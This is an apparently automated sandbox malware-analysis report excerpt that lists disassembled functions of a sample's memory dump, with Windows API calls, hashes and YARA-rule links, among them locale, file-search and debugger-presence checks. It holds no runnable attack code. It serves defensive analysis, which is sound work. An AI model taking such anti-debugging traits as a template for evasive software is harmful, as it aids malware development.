                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog3_catch
                                                                                    • String ID:
                                                                                    • API String ID: 3886170330-0
                                                                                    • Opcode ID: 357b93a5f8b46829888044c1f4bd6e73bf45087ad5d59064c51d463c2ce30af6
                                                                                    • Instruction ID: cedf3701f8e39ad8c792f757943f332b4f0ed5f2325f588e154c969bd61ff707
                                                                                    • Opcode Fuzzy Hash: 357b93a5f8b46829888044c1f4bd6e73bf45087ad5d59064c51d463c2ce30af6
                                                                                    • Instruction Fuzzy Hash: CB412631A017A4DFD721CF66D88AEA8B7F2BF48360F244259D1299B3D1C7759D02CB44
                                                                                    Function 006E1D3C Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Deallocate
                                                                                    • String ID:
                                                                                    • API String ID: 1075933841-0
                                                                                    • Opcode ID: 84e0f362ba8def6aeb3ca8acd2d966855f91abe003eab680a69c40ea49362af5
                                                                                    • Instruction ID: 3792f3d064818878b51f5551a4dac729410afbee6178ea9757a91bdd33a024c3
                                                                                    • Opcode Fuzzy Hash: 84e0f362ba8def6aeb3ca8acd2d966855f91abe003eab680a69c40ea49362af5
                                                                                    • Instruction Fuzzy Hash: 02115B73D013546BDF09DE7A8CA04EFBBB6EF95310B18C6A9D895EB342C2341A029750
                                                                                    Function 006F2875 Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c879e76245c98e6e58db9b68a082edcc21be4ec32c7a78255e82b3b4063c5827
                                                                                    • Instruction ID: 7f812bb182b431313ead8eed166a605480c706030f0a2303d70c672bbe7bfc3c
                                                                                    • Opcode Fuzzy Hash: c879e76245c98e6e58db9b68a082edcc21be4ec32c7a78255e82b3b4063c5827
                                                                                    • Instruction Fuzzy Hash: 5501F93370031AEBDB158E69EC50A6B3397BBC43A07248125FB11DB194EE38C8059F91
                                                                                    Function 006F1F12 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,?,?,006F2336,00000001,00000364,?,00000006,000000FF,?,006EB788,00708A98,0000000C), ref: 006F1F53
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 88460a9f924285a39f9ffa34da4292996b719eace70dc5ce53f2919240c8b119
                                                                                    • Instruction ID: 225212e2f28e7687b02df9fe2670e4d79b0add93dcd5758e2e817993bd73589a
                                                                                    • Opcode Fuzzy Hash: 88460a9f924285a39f9ffa34da4292996b719eace70dc5ce53f2919240c8b119
                                                                                    • Instruction Fuzzy Hash: AFF0B43160722DE6DB255B669C02BBA37DBAB537F0B158151FE189E291DF30D80182E5
                                                                                    Function 006F5F8A Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000000,006F89B1,?,?,006F89B1,00000220,?,00000000,?), ref: 006F5FBC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 5a55dbfcddc6b9bbe04fb45a35204ed34dd04a2ed4daf1985ef0b1486f4fb610
                                                                                    • Instruction ID: 3fbad26a68f03f653ac73e69041947f3ab808a2f9248ba5900e95dc4334415db
                                                                                    • Opcode Fuzzy Hash: 5a55dbfcddc6b9bbe04fb45a35204ed34dd04a2ed4daf1985ef0b1486f4fb610
                                                                                    • Instruction Fuzzy Hash: 54E0E521153B2AABEB2126619C05BFA7A4B8B113B1F1701B4FF26962C0DF20CD014AE9

                                                                                    Non-executed Functions

                                                                                    Function 006FB5E8 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 183COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 006F22E9: GetLastError.KERNEL32(?,?,006EB788,00708A98,0000000C), ref: 006F22ED
                                                                                      • Part of subcall function 006F22E9: SetLastError.KERNEL32(00000000), ref: 006F238F
                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 006FB6F4
                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 006FB73D
                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 006FB74C
                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 006FB794
                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 006FB7B3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                    • String ID: 4Cp
                                                                                    • API String ID: 415426439-1467152804
                                                                                    • Opcode ID: 1e560f22c608fd7ca4e78914d4dda3d3591720a1c0e4b521745dd1d60d7066e4
                                                                                    • Instruction ID: 39fd40c82f0ad0ea7cb9c97def9adf130ad94660300258838e8bea69d5284db2
                                                                                    • Opcode Fuzzy Hash: 1e560f22c608fd7ca4e78914d4dda3d3591720a1c0e4b521745dd1d60d7066e4
                                                                                    • Instruction Fuzzy Hash: 715181B1A0020DABDB50EFA5DC41AFE77BABF48700F145129E610EB290EBB0D9008B65
                                                                                    Function 006FB413 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,006FB731,00000002,00000000,?,?,?,006FB731,?,00000000), ref: 006FB4AC
                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,006FB731,00000002,00000000,?,?,?,006FB731,?,00000000), ref: 006FB4D5
                                                                                    • GetACP.KERNEL32(?,?,006FB731,?,00000000), ref: 006FB4EA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID: ACP$OCP
                                                                                    • API String ID: 2299586839-711371036
                                                                                    • Opcode ID: 774a75a80d9b90ad9bb757f87417114c6cc6eacfba6eff9710e3b54ebcb20536
                                                                                    • Instruction ID: d34cb2f2e8eef519d9dbe4e22c25be2172724c2bfd792bd0732ce8b8036a018e
                                                                                    • Opcode Fuzzy Hash: 774a75a80d9b90ad9bb757f87417114c6cc6eacfba6eff9710e3b54ebcb20536
                                                                                    • Instruction Fuzzy Hash: FE21AE3260010CA6DB348F14CB01BFB73E7AF50B64B569424EA0AC731AEB32DD41C390
                                                                                    Function 006F81B2 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 006F82A2
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 006F8396
                                                                                    • FindClose.KERNEL32(00000000), ref: 006F83D5
                                                                                    • FindClose.KERNEL32(00000000), ref: 006F8408
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFile$FirstNext
                                                                                    • String ID:
                                                                                    • API String ID: 1164774033-0
                                                                                    • Opcode ID: 4833589aa96b0453d4a16efe42c5fbb77d01caca135a88d8b32431f5b2912dae
                                                                                    • Instruction ID: 8495c8d1433e09c27f7b35049d0ee8ec92aedc8872ebc28f2bf049a73ef65aae
                                                                                    • Opcode Fuzzy Hash: 4833589aa96b0453d4a16efe42c5fbb77d01caca135a88d8b32431f5b2912dae
                                                                                    • Instruction Fuzzy Hash: C671017290511D9FDF21EF288C99AFEBBBAAF05300F1442D9E148A7211EE359E858F54
                                                                                    Function 006E7B35 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 006E7B41
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 006E7C0D
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006E7C26
                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 006E7C30
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 254469556-0
                                                                                    • Opcode ID: 6a048fd779df8f08cb2369ebc29e4a471f43e555a2ce11269919a7ea5705218b
                                                                                    • Instruction ID: 9c1216bb9a2081a31e761642dfbbf26f3a270eb2593e1657cd267c8444648531
                                                                                    • Opcode Fuzzy Hash: 6a048fd779df8f08cb2369ebc29e4a471f43e555a2ce11269919a7ea5705218b
                                                                                    • Instruction Fuzzy Hash: 253127B5D05318DBDB60DFA5D9497CDBBB8BF08300F1041AAE40CAB250EB749A858F84
                                                                                    Function 006FB097 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 006F22E9: GetLastError.KERNEL32(?,?,006EB788,00708A98,0000000C), ref: 006F22ED
                                                                                      • Part of subcall function 006F22E9: SetLastError.KERNEL32(00000000), ref: 006F238F
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006FB0EB
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006FB135
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006FB1FB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InfoLocale$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 661929714-0
                                                                                    • Opcode ID: 38c7249e07f552ab1b246bc5e0808f53428080d8f41a9281a4af1553b38a58f1
                                                                                    • Instruction ID: ad241330e36c6244ddf0ecfdbe8dcfe4c3a4a8ea23380cd4b669456dbed49224
                                                                                    • Opcode Fuzzy Hash: 38c7249e07f552ab1b246bc5e0808f53428080d8f41a9281a4af1553b38a58f1
                                                                                    • Instruction Fuzzy Hash: 5761B0B150020F9FDB68DF24CC82BBA77AAEF04310F149179EE05C6685EB74DA85CB54
                                                                                    Function 006EC606 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 006EC6FE
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 006EC708
                                                                                    • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 006EC715
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                    • String ID:
                                                                                    • API String ID: 3906539128-0
                                                                                    • Opcode ID: e58126171cb3bfa21633eb97b3a7b673ecff100b3ac366c196d0164e3364d5af
                                                                                    • Instruction ID: 980c79f81f529e6db66f24545b153c4f9efad3fe223035ded1f809b188171293
                                                                                    • Opcode Fuzzy Hash: e58126171cb3bfa21633eb97b3a7b673ecff100b3ac366c196d0164e3364d5af
                                                                                    • Instruction Fuzzy Hash: 3231C674901318ABCB61DF29D9897CDB7B9BF08310F6041EAE41CA7251EB749F858F44
                                                                                    Function 006F2B47 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,006F14E5,?,20001004,00000000,00000002,?,?,006F0AE7), ref: 006F2B7B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID: mEn
                                                                                    • API String ID: 2299586839-2555016830
                                                                                    • Opcode ID: 8119fc2c9a49dc1d0b27fae39583259044c7d2292383da764becaad7e048f633
                                                                                    • Instruction ID: 5465646dac5312239ded2aa0f40c977bb3bb7a86f04a996c90f66d1ebb8c96a7
                                                                                    • Opcode Fuzzy Hash: 8119fc2c9a49dc1d0b27fae39583259044c7d2292383da764becaad7e048f633
                                                                                    • Instruction Fuzzy Hash: B4E01A3150011EBBCF122F60DC15FAE3B26AB44760F004115FE05A5220CB758D21AAD8
                                                                                    Function 006F736A Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,006F7365,?,?,?,?,?,?,00000000), ref: 006F7597
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionRaise
                                                                                    • String ID:
                                                                                    • API String ID: 3997070919-0
                                                                                    • Opcode ID: d802437829a806bf9a194eef6cba74db31009550ae08129f19483bed7bab63a5
                                                                                    • Instruction ID: 13e989de4121d2051af9f2e86656b82c3590710fb9cf0765ba49f641b494a9f5
                                                                                    • Opcode Fuzzy Hash: d802437829a806bf9a194eef6cba74db31009550ae08129f19483bed7bab63a5
                                                                                    • Instruction Fuzzy Hash: 41B147322146099FD715CF2CC48AAA57BE2FF05364F258658E99ACF3A1C735E992CB40
                                                                                    Function 006E7630 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 006E7646
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FeaturePresentProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 2325560087-0
                                                                                    • Opcode ID: 8f93ed82890c4c297d47062cb1239d80a4493cce24ad0489c0560363040b1547
                                                                                    • Instruction ID: 961af67d2b0d147092168c6ff2648050987faf315c3d263592d62d294d154c86
                                                                                    • Opcode Fuzzy Hash: 8f93ed82890c4c297d47062cb1239d80a4493cce24ad0489c0560363040b1547
                                                                                    • Instruction Fuzzy Hash: C4517BB19153498FEB29CF6AE9917AABBF1FB48314F24812AD405EB350E7789D00CF54
                                                                                    Function 006FB2EA Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 006F22E9: GetLastError.KERNEL32(?,?,006EB788,00708A98,0000000C), ref: 006F22ED
                                                                                      • Part of subcall function 006F22E9: SetLastError.KERNEL32(00000000), ref: 006F238F
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006FB33E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                    • String ID:
                                                                                    • API String ID: 3736152602-0
                                                                                    • Opcode ID: e0f7ecce4159618f99ec8a61d7bbcad3f064cf8204cef38b1aad4299e75b99e7
                                                                                    • Instruction ID: bfa3d46936e8c8c7b452b1b9bdd9123e35cc5674c81521a36a22a1daeda5a8af
                                                                                    • Opcode Fuzzy Hash: e0f7ecce4159618f99ec8a61d7bbcad3f064cf8204cef38b1aad4299e75b99e7
                                                                                    • Instruction Fuzzy Hash: BE21BE7264420AABDF289F25DC42ABA73AEEF44314F20106EFE01C6241EB74ED059B54
                                                                                    Function 006FAF71 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 006F22E9: GetLastError.KERNEL32(?,?,006EB788,00708A98,0000000C), ref: 006F22ED
                                                                                      • Part of subcall function 006F22E9: SetLastError.KERNEL32(00000000), ref: 006F238F
                                                                                    • EnumSystemLocalesW.KERNEL32(006FB097,00000001,00000000,?,-00000050,?,006FB6C8,00000000,?,?,?,00000055,?), ref: 006FAFE3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                    • String ID:
